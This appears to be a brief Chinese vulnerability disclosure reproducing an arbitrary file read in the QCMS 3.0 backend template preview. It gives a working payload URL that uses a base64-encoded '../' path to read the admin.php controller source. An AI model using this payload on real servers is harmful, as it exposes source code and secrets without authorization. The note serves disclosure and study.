QCMS 3.0 任意文件读取¶

一、漏洞简介¶

二、漏洞影响¶

QCMS 3.0

三、复现过程¶

用seay扫了一下后发现的漏洞

漏洞在后台模板代码预览处，构造payload例如

http://url/backend/template/tempview/Li4vLi4vLi4vQ29udHJvbGxlci9hZG1pbi5waHA=.html

即可读取Controller文件下admin.php文件源码

跟源码对比下，确实是读到了

参考链接

https://xz.aliyun.com/t/7269